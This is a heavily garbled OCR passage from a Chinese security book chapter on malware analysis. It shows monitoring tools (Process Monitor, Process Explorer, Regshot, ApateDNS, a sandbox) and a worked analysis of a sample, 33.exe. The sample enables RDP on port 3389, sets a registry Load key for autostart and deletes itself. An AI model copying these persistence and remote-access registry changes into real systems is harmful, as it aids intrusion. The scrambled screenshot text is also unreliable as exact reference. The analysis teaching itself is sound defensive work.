Be File Edit View Dptions Profile Yindow Help 
= ki ©К ct = ан Зант w E T № 
日 … 国 £f Ah. EIE 加 | 了 |ordiaal” |нш |Funetion [му ши | | 


由 -… О KEEL. DLL 1 С] НА О 100000) | МезззЕеБохА Not Pound 


Я cmI32.0LL 
由 … ® KERNEL32. DLL 
е А FTDLL. DLL 
B- за ADVAPI32.DLL 
: H- [A] EEREEL32 ILL 
е ITDL ILL 
H- Ë] ЕРГЕТІ DLL 
=] WINTRUST ILL 
= EL] SECVR32. DLL 
ее ADVAPT32 IIL EIUS аң нн ЫН ын 
由 KERNEL32. DLL 1 10:0001) О 100000) | деф: та «КеуБо ак dLayout 0х00018673 
: - М FLL DLL 2 Юх0002) 1 100001) | AdjastYiraonwEKect 0500021 140 
=.-Я HETAPI32 DIL 3 IDx0003J| 2 0х0002) | kdjastYindowkeciEx Ох0001ЕТЕА 
: ; ADVAEI32. DLL 4 1050004) 3 100003) Мі:Егсіз 0х000504Е0 
KERNEL32. DLL 5 0200063 4 10-0004) | А11 о Е оке ргоппЯ Ас 3 уа# тот 0=00045414 
WSVCET ILL в 0:0006) 5 10:0005) | AllonSetForegroundt indor 0200011:40 
#1011 DIL T 100007) | 6 1020006) | AninsteWindor 0500012155 
СОД RECRT4 ILL 8 10:0006)| Т 10:0007) | Ary? opup 0z00059C27 
: КТ ЗЕСІЕЗ2. DLL 2 9 і0=009) 8 10008) | кррегдйеплА 0500021208 
0 0хСО0А) Я 100009) | Аррсг«Йегай 0х000132БА 
г 


М йшй лымды » Па гапъл 1 ImzPmnA | вым уус Т ез оні AW; n Асма = mmnnd4sTR4R 


[Тез Te Te Sas ГЕ ии Теле ес Тане TEk балы [Ps беден TE Трава ТЗ Preferred Base 
ASTAVA. DLL Error opening Eile. 22 = 
MPR. DLL 2008-04-14 20:00 2008-04-14 7 13 =: 904 
сшзг ILL 2008-04-14 20:00 2208-04-14 10:12 255, 154 
KERMEL32 DLL | 2008-04-14 20:00 |2008-04-14 10:13 1,150, 464 
FIDLL ILL 2008-04-14 20:00 2008-04-14 10:13 589, 312 
VSEE32. DLL 2008-04-14 20:00 2008-04-14 10:13 574, 975 
Я МА EXE | 2015-04-29 22:23 |2015-04-29 22:23 28, 672 
ACTIVEIS DLL | 2008-04-14 20:00 2008-04-14 10:12 192, 000 
ADSLDPC. DLL | 2000-04-14 20:00 2708-04-14 10:12 145, 380 


89-18 Dependency Walker 界 面 


ЕЕ 


0200015896! 000016861 х5 Console си xT А20000 
030004960 0х0004950Е 255 Console Cv Ох? TEFOOIO 
0х00122828 0х0й0122А2В 285 Console сү 0х1С820020 
П«00087СВ7 00008 7СВТ х95 Console су 0576920000 
0х00080421 0х00081421 165 GUL сү 0xTTD10020 
Dx00000000 0х00015008 285 GUT 0570400000 
ПуПППЗТЕЗЬ 00037836 z855 Console cy 0577290070 
0х000291А3 0х000201 43 02 Console сү 0х761Е0090 


> = = > = >= >= > 
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接 下 来 将 介绍 两 种 强大 的 进程 监控 软件 一 Process Monitor 和 Process Explorer。 


3. Process Monitor, ВЕ 15328 ( 简称 procmon ) 


procmon 的 主 界 面 如 图 9-19 所 示 ， 图 上 详细 列举 了 每 一 个 程序 所 使 用 的 函数 、 路 径 等 


详细 信息 。 


m; Process Nonitor - Sysinternals: 


Edit Event Filter Tools 


Üptions Help 


www. sysinternals. com 


9; 
9: 
9: 
9: 
9: 
9: 
9: 
EF 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
|| 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
%: 
ЕН 
3: 
КЕ 
2! 
2: 
27 
9: 
ЕД 
J: 
9: 
rk 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
3: 


& | ç À @ | 


Process Hame 


ЖУ Procmon. 
27 Procmon. 
ЖҮ Procmon. 
2] Procmon. 
ЖУ Frocmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ехе 
ехе 
ехе 
ехе 
еше 
еше 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ЖУ Procmon. 
27 Procmon. 
ЖУ Procmon. 
ШУ Procmon. 
27 Procmon. 
27 Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
2? Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 


Г sass. 
ГІ 15а55. 
7] 1sass. 
Г l sass. 
Г 1 sass. 
Г 1sass. 
F 15а55. 
C] 1sass. 
ГІ 1sass. 
ГІ l sass. 
Г 1 sass. 
Г 1 sass. 
Г 1 sass. 
Г” 1 sass. 
Г 1 sass. 
Г 1 sass. 


Г System 


ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖҮ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
; . еке 


есе 
есе 
есе 
есе 
есе 
есе 
есе 
есе 


ехе 
ехе 
ехе 
ехе 
есе 
ехе 
ехе 
ехе 
есе 
ехе 
есе 
есе 
ехе 
ехе 
ехе 
ехе 


есе 
есе 
есе 
есе 
ехе 
есе 
есе 


= | 


РІП Operation 


3236 ЖА РАЅТІО НЕТН... 
3236 Е ЕАЗТТО НЕТА... 
3236 Е ОТКР ИТ СКЕАТЕ 


3236 区 ЕАЗТТО НЕТ"... 
3236 ER ЕАЗТТО НЕТЯ.. 
3236 EK ЕАЗТТО НЕТТ... 
3236 ER ТЕР_И] СКЕАТЕ 
708 Ж КегОрепКеу 
708 ЁЙ Кегбрепкет 


ав мат 


С: АТ НОВА у 5 ет? 4Беһеір. 411 
С: NWINHDOWSVsystem32Vdbghelp. 411 
С: NÑINMDOTRSNsrstem32"dbghelp. 411 
3236 EK БАЗТТО НЕТ®...С: 
С 
С 
С 
С 


Path 


VNIHDOWSNsystem32VWSCTFIXE. 


: \RINDORS\ system32ż\MSCTFIME. 
: NVWINHDOWSNsrstem32"MSCTFIME. 
: \RINDORS\system32ż\MSCTFIME. 
: \ 9140095 5754 ет32\ ИЗСТЕТИЕ. 
НКГИ\ ЗЕСЛАТТУ\Ро11су 

НКГИ\ ЗЕСЛЛАТТУ Ро! ісу ,ЗесПезс 


ТИЕ 
ТИЕ 
ТИЕ 
ТИЕ 
ТИЕ 


708 № FRegQueryValue НКГИ\ ЗЕСЛЕТТУ\Ро1 су 5есПезс\ (.. 


708 ЁЙ RegCloseKey 
708  КеҥОрепКеу 


TÜ8 ЁЙ RegCloseKey 
т08 А KegCloseKey 
708 Ж КесОрепКеу 
708 Ж КегОрепКеу 
708 ЁЙ RegQueryValue 
708 ЁЙ RegCloseKey 
708 ЁЙ КесОгепКеу 


708 ЁЙ КекСісзеКеу 
т08 ЁЙ кеЕС1озеКеу 
3236 EK ЕАЗТТО НЕТН... 
3236 2% ТЕР М) СКЕАТЕ 
3236 EK FASTIO_ACQU... 


3236 EK FASTIO_RELE.. 
3236 EK FASTIO_ACQU.. 
3236 EK FASTIO RELE.. 


3236 HÑ ІЕР М) CLOSE 

3236 EK РАЅТІО НЕТЋ... 
3236 ER ТЕР М) СКЕАТЕ 
3236 EK FASTIO_ACQU... 


3236 ФА FASTIO_RELE... 

3236 EK FASTIO_ACQU... 

3236 ЕҚ FASTIO_RELE... 
4 ВАТЕР М) ОМЕК.. 


3236 EK IRP ИЈ CLOSE 
3236 EK ЕАЗТТО НЕТА... 
3236 Е IRP_MJ_CREATE 


3236 EK FASTIO_QUER.. 
3236 ЗА FASTIO_ RELE. . 
3236 СА ЕАЗТТО ACQU.. 


С: 
С: 
C:NNÑIHDONSVsystem32N1sass. 
3236 EK FASTIO_QUER...C: 
С: NÑIHDONSNsystem32N1sass. 
С: NWIHDONSNsystem32N1sass. 
.C:VÑIHDONSNsystem32N1sass. 
3236 EK ТЕР М) СПЕАКИРС: 
С: ВІНОК 5754 ет324,1 sass. 
С: VWINHDOWSNsystem32N1sass. 
С: \ 914009 $ \ 5754 ет3 241 5а553. 
С: \9ГНОЯ $ \ 5754 ет32\1 5255. 
3236 EK FASTIO_QUER...C: 
С: NWINHDOQWSNsystem32N1sass. 
С: VWINDOWQSNsystem32N1sass. 
С: NVWINHDOWSNsystem32N1sass. 
„С: VÑINDORSNsystem32N1sass. 
3236 EK IRP_MJ_CLEANUPC: 
С: NÑINDONWSNsystem32N1sass. 
С: NÑINDONSNsystem32N1sass. 
С: АНТНООНО 4 вт 5 ет324,1 5а55. 
3236 EK FASTIO_ACQU...C: 
С: VWINDOWQSNsystem32N1sass. 
HS они на 
жы, 


НКГИ\ ЗЕСЛЛАТТУ \Ро11су\ бес езс 
НКГИ\ SECURITY \Folicy\SecDesce 
708 № RegQueryValue НКГИ\ ЗЕСЛЕТТУ\Ро1 і су \ $есПезс\ (. 
НКГИ\ SECURITY \Folicy\SecDesc 
НКГИ\ SECURITY Ро! 1 су 

НК И SECURITY Ро! 1 су 

НКГИ\ ЗЕСЛАТТУ Ро! 1 су „ЗесПезс 
НКГИ\ SECURITY Рой су\бесПезс\ l.. 
НКЪ И SECURITY Ро! 1 ст ,ЗесПезс 
НКЪ И SECURITY Ро! 1 ст ,ЗесПезс 
708 Ж FegQueryValue НЕГИЗЕСИКТТУ Ро! 1 су убесПезс 4 (... 
HKLM SECURITY Policy SecDesc 
HKLM'SECURITYNPolicyr 


ЧАТНООНВ зу зі ет3241 sass. 
ВІНО 57541ет32\15а55. 


ехе 
ехе 
есе 
есе 
ехе 
ехе 
есе 
еде 
есе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
есе 
есе 
ехе 


ЧЪТНООН Ч 5754 ет32\1 5255. 


\ 7107$ \ 5754 ет32\15а55. 


\ 1007$ \ 5754 ет32\ 15255. 


ЧАТ НОВА 5754 ет32\ 15255. 


\ #140075 \ 5754 ет32415а55. 


9-19 ”procmon 主 界面 


Fesult 


SUCCESS 
SUCCESS 


SHARING VIOLA... 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


SHARING VIOLA... 


SUCCESS 
SUCCESS 


. BUFFER OVERFLOR 


SUCCESS 
SUCCESS 


.. SUCCESS 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


. BUFFER OVERFLOW 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


Detail 


CreationTime:... 
CreationTime:... 
Desired Acces... 
CreationTime:.. 
CreationTime:... 
CreationTime:... 


CreationTime:. 


Desired Acces... 
Desired Acces... 
Desired Acces... 


Length: 12 


Desired Acces... 
КЕС МОН... 


Туре: 


Desired Acces... 
Desired Acces... 


Length: 12 


Desired Acces... 
КЕС МОН... 


Туге: 


CreationTime:. 


Desired Acces... 
бута... 
QuerySt... 


5угсТуре: 
Туре: 


5угсТуге: 


Стеа? 10111те:... 
Desired Acces... 
ӨТІП 25 
QuerySt... 


5угсТуге: 
Туре: 


5угсТтге: 


Туре: 


CreationTime:... 
Desired Acces... 
Syn... 
рчетт 84... 


5угсТтге: 
Туре: 


671... 


571... 


рчетт На... 


选中 其 中 的 一 个 程序 双击 ， 打 开 Event Properties 对 话 框 ， 可 以 看 到 这 个 程序 所 加 载 的 
DLL 库 连 接 、 创 建 与 运行 时 间 ， 如 图 9-20 所 示 。 在 Process 选 项 卡 中 可 以 看 到 程序 所 在 的 安 
装 地 址 以 及 最 下 方 整个 程序 所 加 载 的 DLL 库 及 其 位 置 ， 如 图 9-21 所 示 。 而 最 后 一 个 Stack 选 
项 卡 ， 描 述 了 程序 以 及 加 载 的 DLL 库 函数 在 内 存 中 的 位 置 。 


190 


жон 病毒 不 神秘 人 MM 


Event Properties 


Event | Process | Stack 


Image 
Event Properties Process Monitor 


Event |Process | Stack Sysinternals - waw, sysinternals.com 


Name: Procmon.exe 
Date: 2015-4-30 9:39:20 


Thread: 3972 
Class: Flle Systern Path: 

Operation: ҒА5ТІО МЕТЖОВК ОМЕВҮ ОРЕМ C:\Documents and 5ettings\admin\ 桌 面 \ 恶 意 病 毒 分 析 \ProcessMonitor(1)\Procemon,ex| 
Result: SUCCESS 

Path: C;lWwlNDOwWS1system3zidbghelp.dll 
Duration: 0.0000001 


Version: 3.11 


Command Line: p ДЕ емее в ай : 
"C:\Documents and Settingsladmin! 点 面 亚 意 病毒 分 析 \ProcessMonikor(1)Procmon.e| 


CreationTime: 2008-4-14 20:00:00 PID: 3236 Architecture: 32-bit 


LastAccessTirme: 2015-4-30 9:39:20 
LastwriteTime: 2008-4-14 20:00:00 Porent PD: 1900 Virtualized: т/а 


ChangeTime: 2014-10-14 20:16:17 : 7 я 
AllocationSize: 643,072 Session ID: 0 Integrity: | гуа 


EndOfFile: 640,000 User: ASD-297B0F069901ədmin 
FlleAttributes: A 
Auth ID: 00000000:00026Ғаб 
Started: 2015-4-30 9:39:19 (Running) 
Modules: 


Module Address Path ^ 
Ргостоп,ехе 0х400000 C:\Documents and Sett = 
ZYW INE OWSIsystem3 
ухфете, dil C:WINDOWSLsysterm3 
МЕТАРТЗ2. 4! C:WINDOWSLUsystem3 | 
| T В 


+ | * овес нд eornm | +|+[ Dewa Саны | зе”) 
图 9-20 “Event 选 项 图 9-21 “Process 选 项 
该 程序 最 有 用 的 则 是 Process Monitor Filter 功 能 ， 如 图 9-22 所 示 。 


ШЕ Process Wonitor Filter 


Rernove 


山 


Display entries matching these conditions: 
м 
IRP_MJ_SET_VOLLIME_INFORMA A 
IRP_MJ_SHUTDOWN я 
ІРР МЈ 5Ү5ТЕМ CONTROL 
ТЕР МЈ YOLUME _DISMOLINT 
ора р IRP_M]_YOLUME_MOUNT 
r IRP_MJ_WRITE 
Q Event ... is IRP_MN_QUERY_INFORMATION 
Load Image 
Process Create 
Process Exit 
Process Profiling 
Process Start 
Process Statistics 
RegCloseKey 
КедСгеаеКеу 
RegDeletekey 
RegDeletevalue 
КедЕпитКеу 
RegEnurnvalue 
RegFlushKey 
RegLoadKey 
КедОрепКеу 
КедбиегуКеу 


RegĝueryY alue 
RegRenameKey 

RegSetInfoKey 

RegSetkeySecurity 

RegSetvalue М, 


图 9-22 Filter 过 滤 
读者 可 以 在 Filter 中 选择 想 监控 的 函数 ， 这 样 可 以 使 繁杂 的 界面 变 得 简单 ， 同 时 也 可 
以 有 针对 性 地 对 病毒 的 某 种 功能 进行 详细 监控 。 
其 实 看 程序 最 方便 的 还 是 看 进程 树 ， 虽 然 这 款 软 件 中 也 有 Process Tree (Tools 选 项 下 
第 2 个 ) 功能 ， 但 是 却 无 法 与 接 下 来 将 要 介绍 的 软件 相 比 。 
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4. Process Ехрогег 


Process Explorer 可 以 使 进程 、PID、CPU 占 用 率 等 一 目 了 然 ， 其 中 标记 监 色 的 进程 为 
用 户 进程 ， 红 色 为 系统 进程 ， 绿 色 为 新 运行 的 进程 ， 如 图 9-23 所 示 。 为 了 碍 看 系统 文件 是 


же 
ж System Idle Process 
Ші заем 
224 Interrupts 
B ГІзт55. ехе 
С5Ү55. ехе 
а В winlogon. ехе 
日 Гтізегтісез. ехе 
Ymacthly. ехе 
svchost. ехе 
F] svchost ехе 
B [и] зусвози. ехе 


wuaauclt. ехе 


wscntfy, ехе 


И] svchost ехе 

Асо. ехе 
зроо| <у. ехе 

G vmtoolsd. eze 
alg. ехе 


= gi TPAutoConnsve. Да 
о TPAutoConn. Да 


Гоа. ехе 
15455. ехе 
日 3 explorer. ехе 
ТГ утфоо134. ехе 
М АйоһеАВИ ете 
Ë сі fmon. ехе 
notepad. ее 
notepad. ехе 
notepad. ехе 
RinRAR. ехе 
5 SogouCloud. ехе 
Оу рхосехр. еше 
Е: соп те. ехе 


> 


п/а Hardware Interrupts а... 
580 Windows НТ Session Ma... 
628 Client Server Runtime... 
652 Ñindows НТ Logon Арр1... 
696 Services and Controll... 
880 VMware Activation Helper 
896 Generic Host Process ... 
964 Generic Host Process . 
1060 Generic Host Process ... 
2016 Automatic Updates 
1408 Qindows Security Cent... 
1148 Generic Host Process ... 
1260 Generic Host Process ... 
1432 Spooler SubSystem Арр 
1676 VMware Tools Core Ser.. 
192 Application Layer Gat... 
392 ThinPrint AutoConnect... 
1000 ThinPrint AutoConnect... 
1724 Image Mastering АРІ 
708 154 Shell (Ezport Ver... 
1988 Windows Ezplorer 
1024 WWware Tools Core Ser... 
1084 idobe Reader and Acro... 
1096 CTF Loader 
3432 记事 本 
3955 记事 本 
512 记事 本 
1352 WinRAR archiver 
2908 ЮЛЕ сіне 


1704 Sysinternals Process ... 


208 

2, 636 
8, 204 
1, 816 
712 

2, 956 
1, 924 
18, 212 
5, 772 
664 
1,416 
1, 796 
4, 796 
3, 368 
1, 240 
1,468 
4, 284 
2, 372 
3, 844 
35, 716 
11, 424 
4, 252 
984 

1, 564 
1, 564 
1, 564 
4,640 
2, 344 
26, 316 


6, 912 
5, 384 
3,504 
2,608 
5, 444 
4,452 
27,600 
5,480 
2,464 
3, 720 
4, 552 
T, 148 
12, 376 
3, 704 
4, 454 
7, 916 
4, 132 
1, 224 
12, 716 
16,660 
8, 216 
3, 768 
820 
828 
748 
712 

7, 056 
17, 872 


зәмзәм q > =í > о = = 
м > = > = > > > > >t та > >q >q >t оят ы 


Ш 


CPV 使 用 率 : 1.81% ЖЕТЕУ: 14. 15% | 进程 数 : 34 内 存 使 用 率 : 37.21% 


5. Regshot 


Regshot 是 一 于 注册 表 快 照 软件 。 单 击 “ 快 照 CA) ”按钮 运行 目标 文件 ， 单 击 “ 快 照 
(B) ”后 就 会 出 现 检测 注册 表 是 否 修 改 ， 以 及 伴随 大 注册 表 修 改 而 产生 的 文件 报告 ， 如 


图 9-24 所 示 。 


图 9-23 ”procexp 进 程 树 


G: Regshot 2.0.1.66 unicode 
文件 快照 快照 @B) 5% мы 


Г] ЕНЕНЕ 
报告 保存 文件 来 ; 


[C:\Documents апа 5ettings\admin\ 虚 面 | т | 


ВЕС: 


| Report 


全 部 清除 
添加 注释 到 报 肖 ; 


| 
| 


— Ии = 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
VMum re, Inc. 

Microsoft Corporation 


. Microsoft Corporation 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 


. УИмате, Inc. 


Microsoft Corporation 
Cortado Аб 

Cortado Аб 

Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
VAware, Inc. 

Adobe Systems Incor... 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
ålezander Roshal 
Sogou, com Inc. 
Sysinternals - www... 
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9.2.4 ”虚拟 环境 搭建 


使 用 虚拟 机 搭建 虚拟 环境 在 分 析 病 毒 时 是 


不 可 或 缺 的， 模拟 出 一 个 真实 的 系统 并 且 构 造 |2460 жар лай ите ме, 


出 一 个 虚拟 的 网 络 来 隔绝 病毒 在 互联 网 传播 。 | 
VMware Workstation 软 件 如 图 9-25 所 示 。 9-25 Vmware Workstation 软 件 


VMware Workstation 的 安装 过 程 以 及 基本 使 用 方式 与 VBox 类 似 ， 不 再 更 述 ， 这 里 主要 
介绍 一 下 虚拟 网 络 的 搭建 过 程 。 
ApateDNS 软 件 界面 如 图 9-26 所 示 。 


ГР ApateDNS Ге Ге |: | 


Capture Window 


Domain Requested DNS Returned 


DNS Reply ТР (Default: Current Са нау/ DNS): .127.0.0.1 
# of NXDONAIN s: 0 


Selected Interface: УМкаге Virtual Ethernet Adapter for Wnet? + 


图 9-26 ApateDNS 主 界面 
打开 ApateDNS， 在 主 界面 的 CaptureWindow 选 项 卡 下 会 显示 访问 Internet 的 网 络 活动 ， 
在 下 方 的 DNS Веру IP 处 填写 将 要 访问 的 虚拟 IP 地 址 ， 在 Selected Interface 处 选择 虚拟 机 当 
前 使 用 的 网 络 ， 单 击 Start Server 按 钮 ， 结 果 如 图 9-27 所 示 。 
|" ApateDNS Ee |657 


Domain Requested DNS Returned 

g. localdomain FOUND 

auto. search. msn. com FOUND 
FOUND 
FOUND 
FOUND 


FOUND 


[+] Server started at 21:16:27 successfully. 


DNS Reply IP (Default: Current Gatway/DNS): Start 
— Server 


# of НХПОМАТЕ s: 0 


图 9-27 ”运行 后 结果 
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随后 在 虚拟 机 中 打开 任意 一 个 网 站 ， 地 址 解析 将 会 跳 转 到 输入 的 虚拟 IP 地 址 ， 同 时 
ApateDNS 下 也 会 显示 将 要 访问 的 网 站 。 如 果 想 要 详细 地 了 解 病 毒 的 网 络 动 态 ， 请 使 用 
Wireshark 进 行 抓 包 。 

当然 ， 有 些 病毒 具有 有 反 虚 拟 机 技术 ， 即 在 虚拟 机 环境 下 病毒 不 会 运行 ， 这 时 便 需 要 使 
用 沙 箱 / 沙 盒 〈 见 图 9-28) 代替 虚拟 机 环境 。 


Не Мем Sandbox Configure Help 
Program Name | PID Window Title 


(> Sandbox DefaultBox 


19-28 В 
将 程序 拖 入 沙 箱 ， 就 可 以 在 一 个 安全 环境 下 运行 了 。 
接 下 来 将 用 以 上 提 到 的 工具 对 病毒 进行 行为 上 的 分 析 以 及 代码 上 的 揭秘 。 


9.2.5 ”病毒 实例 分 析 


请 务必 于 虚拟 机 或 者 沙 箱 内 运行 。 
33.exe《〈 见 图 9-29) 是 一 个 典型 的 PE 文件 ， 先 使 用 杀毒 软件 对 其 进行 手动 查 杀 。 


图 9-29 33.exe 
(1) 先 对 虚拟 机 进行 一 次 快照 ， 作 为 系统 还 原 备份 ， 并 且 记录 当前 运行 环境 信息 作 
为 备注 ， 如 图 9-30 所 示 。 
病毒 测试 专用 设备 - НАЯ "=; 
ç ЕТО АВА ЛАКЕ, UREE 


名 称 (N): 快照 1 
E(D): 运行 33.exe 之 前 


图 9-30 ”拍摄 还 原点 
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(2) 搭建 虚拟 网 络 ， 阻 止 病毒 与 网 络 的 接触 ， 将 网 络 配置 选择 为 虚拟 机 当前 网 络 ， 
如 图 9-31 所 示 。 
Selected Interface: 
图 9-31 设置 虚拟 网 络 
有 了 以 上 两 点 准备 以 后 ， 就 可 以 先 尝 试 从 行为 上 对 其 进行 分 析 。 
(3) 打开 Regshot 软 件 ， 对 其 进行 两 次 快照 ， 快 照 时 应 选择 全 部 注册 表 并 且 备 注 信 
дА, шЕо- 32 я. 


&: Regshot 2.0.1.66 unicode 
хе ВФ Во Жа 帮助 


[Г] 连接 到 远程 注册 表 
报告 保存 文件 夹 ; 
C:\Documents and Settingstadmin s [HJ = 
报告 名 称 ; 
全 部 请 除 


添加 注释 到 报 肖 ; 


图 9-32 注册 表 快 照 
快照 (A) 完毕 后 运行 33.exe 程 序 ， 同 时 使 用 Process Explorer 进 行进 程 监控 。 随 后 运行 
33.exe， 然 后 进行 快照 〈(B) ， 快 照 完毕 后 会 弹出 一 个 分 析 报 告 网 页 ， 从 中 可 以 看 出 注册 
表 项 的 变化 〈 见 图 9-33 一 图 9-36) 。 
3 快照 比较 报告 Regshot 2.0.1.66 unicode - Microsoft Internet Explorer 
РЕ) жіне) SEV ША) ТАФ $ 


O=- O- Ш ИФ ри дих © @- > = 3 
НЫЕ Ф) (E) C:\Documents and Settings\Admini strator\A\33\Report. lm Es OO 
CHR (о) 快照 A 


新 添加 键 (7) ТАШ в 


(НКЕТ LOCAL MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersiom\netcache] 
[HKEY LOCAL МАСНІМЕ\ ЗҮЗТЕМ\ ControlSet001\ Controli Terminal Serveri RDPTcp] 
[HKEY LOCAL MACHINE, SYSTEMYControl3Set001Servicesy RDPUDA Еп] 
[HKEY_LOCAL_MACHINE\ SYSTEM; ControlSet00 1\ Services ТрТСР\ Enum] 

[НКЕҮ LOCAL МАСНТМЕ\ SYSTEM CurrentControlSet\ Controli Terminal Зегуег\ RDPTep] 
[НКЕҮ LOCAL МАСНІМЕ\ SYSTEM CurrentControlSet\ Services RDPWDA Enum] 
[HKEY_LOCAL_MACHINE\ SYSTEM CurrentControlSet\ Services ТрТСР\ Enum] 


9-33 注册 表 变 化 (1) 
从 图 9-33 中 ， 可 以 看 出 新 添加 的 注册 表 键 值 ， 其 中 的 RDPTcp 和 TDTCP 均 为 启动 
“3389”， 也 就 是 远程 昌 面 控制 的 注册 键 值 PortNumber 的 值 修 改 为 3389。 


- 155 = 


EN 黑客 与 安全 技术 指南 


СМЕНЕН (1) 快照 A 
[HKEY_LOCAL_MACHINE" SOFTWARE; Microsoft УУВЕМ\ WDM ] 
"С: \ WINDOWS\" зузсеш3 2 \ DRIVERS) \ ipnat.sys[IPNATMofResource] "="LowDateTir 


新 添加 值 (15) HE B 

[HKEY_LOCAL_MACHINE" SOFTWARE" Microsofti Windows"CurrentYersion\ netcache] 
"Enabled"="O" 

[HKEY_LOCAL_NMACHINENSYSTENINControlSet001` Control Terminal бегуег\ КОРТср] 
"PortNumber"=dword:00000d3d 

[HKEY_LOCAL_MACHINE"SYSTENM\ .ControlSet001" Services‘\ RDPWD\ Enum] 
"0"="Воос\ \ LEGACY RDPWD\\ 0000" 

"Count "=dword:00000001 

"Next Instance"=dword:00000001 

[НКЕҮ 1 ОСА _МАСНМЕ\ SYSTEM ControlSet001" Services, ТОТСР\ Enum] 
"0"="Воос\ \ БЕСАСУ ТРТСР\\ 0000" 

"Count "=dword:00000001 

"МехсТизтапсе"=ачцока: 00000001 

[HKEY_LOCAL_MACHINE"SYSTENM\ CurrentControlSet\ Control, Terminal 5егуег\ ВОРТср] 
"РогеМикрек"т-ауога:оооооаза 

ІНКЕУ 10САІ МАСНІМЕ\ SYSTEM CurrentControlSet" Services КОР\ОХЕпит | 
"DO"="ROOLYYLEGACY RDPVDYYDDOD0" 

"Count "+ дчога:00000001 


图 9-34 注册 表 变 化 (2) 


已 改变 值 (13) 快照 A 

[HKEY_LOCAL_MIACHINE\SOFTWARE\Miicrosoft\Cryptography\RNG] 

"Зеей"-һех:95,60,д44,ее,2а,е8,с4,59,58,06,4а,4Ғ,34,77,81,е2,51,е6,02,04,44,83,% 
26,84,46,ра,р1,59,64,сҒ,0с,79,5с,05,0р,с5,43,51,5%,0с,53,50,69,58,(с,а1,са,% 
05,34,5(4,41,05,Ғ7,1с,07,50,74,36,а6,46,28,2р,54,е7,59,с1,ес,с4,13,ер,9с,32,% 
Та,аа,га,ре,73,ее,3За,1Г0 


"Зеей"-һех:0Ғ,53,11,242,18,рр,9Ұ,с5,се,6р,03,28,5,43,61,62,40,е6,4р,е4,75,24,% 
2а,34,ас,49,13,а9,30,а4с,50,1с,88,50,47,с0,2а,19,41,ес,ес,24,38,43,66,57,сЬ,% 
08,0е,05,34,4а,59,54,Брс,09,09,01,3с,с5,8е,44,ае,а3,44,6с,са,Ғ2,59,0е,95,78,% 
0a, f3, 44,79, 16, е8, а5,е9 


[HKEY_LOCAL_MACHINE\SOFTWARE'\Microsoft\ Windows NT\CurrentYersion\pProfileList\5-1-5-19] 
"ВеЁСоцис"=ацога: 00000002 

"ВеЁёСоцис"=ачога; 00000001 
[HKEY_LOCAL_MIACHINE\SYSTEYIControlSet001\ControhTerminal Server] 
"fDenyTSConnections"=dword:00000001 
"fDenyTSConnections"=dword:00000000 
[НКЕУ_ГОСАЕ_МАСНИМЕ\ бУЗТЕМ\ ControlSet001\ Services ЅһагедАссеѕѕ\Еросһ] 
"Epoch"=dword:00000018 

"Epoch"=dword:00000019 

[HKEY ГОСАС МАСНТМЕХЗУЗТЕМА ControlSet001\ Services TermDD ] 
"Start"=duord:00000001 

"Бсасс"-амога:00000002 


[НКЕУ_1ОСАЕ_МАСНИМЕ\ SYSTEM) ControlSet001\, Ѕегиісеѕ\ Тегіпбегмісе | 
"бсасс"-амога:00000003 
"Зтагс"=ацога: 00000002 


89-35 ”注册 表 变 化 (3) 


[HKEY_USERS" .ОЕҒАШТ\ Keyboard Layout" Toggle] 

"Носкеу"-"1" 

"Носкеу"< "2" 

[НКЕУ_05ЕВ5\,5-1-5-18\Кеубоаг4 Layout Toggle ] 

"Носкеу"="1" 

"Ноткеу"="2" 

[HKEY_CURRENT_USER" Software Microsoft\ Windows NT\ СиггепЕмегѕіоп\ Windows] 
"Тоай"<"" 


"Тоай"< "С: АА WINDOVUSYY зузсетз2\\33.ехе" 


图 9-36 ”注册 表 变 化 (4) 
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从 图 9-36 中 ， 也 就 是 HKEY CURRENT USER\Software\Microsoft\Windows КТ) 
CurrentVersion\Windows\load, Load ="С: \\WINDOWS\\system32\\33.exe", 可 以 看 出 33.exe 
将 其 自身 复制 进 系统 目录 ， 并 且 修 改 load 键 值 ， 实 现 程 序 随 注 册 表 自 启 动 。 

运行 完 以 后 ，33.exe 从 果 面 上 “消失 ”， 工 具 procexp 捕 捉 到 cmd.exe 短 暂 的 运行 ( 见 
图 9-37) 过 程 ， 目 此 可 以 推 新 其 利用 CMD 命 令 进行 目 我 删除 。 


ЗА согапе. ехе Уаз к з, U3b К 1100 Lonsole ІАЕ 
o gna. еле 0.72 1, 556 K 1,616 К 1796 Ñindows Commar 


CPU 使 用 率 : 14. 13% TEU. 11.93% 进程 数 : 31 内存 使 用 率 : 27.04% 


图 9-37 ”工具 procexp 捕 捉 
